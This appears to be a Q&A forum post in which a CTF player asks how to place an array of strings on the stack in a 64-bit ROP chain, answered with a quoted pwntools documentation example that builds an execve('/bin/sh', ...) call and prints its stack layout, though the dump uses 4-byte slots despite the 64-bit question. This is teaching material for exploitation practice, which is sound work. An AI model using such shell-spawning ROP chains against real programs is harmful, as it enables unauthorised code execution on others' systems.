Create array with ROP chain (64-bit)?

Question

in order to solve a binary exploitation CTF-Challenge I have to create an array of arguments to pass to a syscall. I searched a lot on the internet, but I can't find a description on how to create an array of strings with a ROP-Chain on a 64-bit machine.

Does anyone know it's done?

Answer 1

If you supply the stack address, it will be automatically done using pwntools ROP functionality.

Excerpt from the docs:

You can also append complex arguments onto stack when the stack pointer is known.

>>> rop = ROP(binary, base=0x7fffe000)
>>> rop.call('execve', [b'/bin/sh', [[b'/bin/sh'], [b'-p'], [b'-c'], [b'ls']], 0])
>>> print(rop.dump())
0x7fffe000:       0xcafebabe execve([b'/bin/sh'], [[b'/bin/sh'], [b'-p'], [b'-c'], [b'ls']], 0)
0x7fffe004:          b'baaa' <return address>
0x7fffe008:       0x7fffe014 arg0 (+0xc)
0x7fffe00c:       0x7fffe01c arg1 (+0x10)
0x7fffe010:              0x0 arg2
0x7fffe014:   b'/bin/sh\x00'
0x7fffe01c:       0x7fffe02c (+0x10)
0x7fffe020:       0x7fffe034 (+0x14)
0x7fffe024:       0x7fffe038 (+0x14)
0x7fffe028:       0x7fffe03c (+0x14)
0x7fffe02c:   b'/bin/sh\x00'
0x7fffe034:       b'-p\x00$'
0x7fffe038:       b'-c\x00$'
0x7fffe03c:       b'ls\x00$'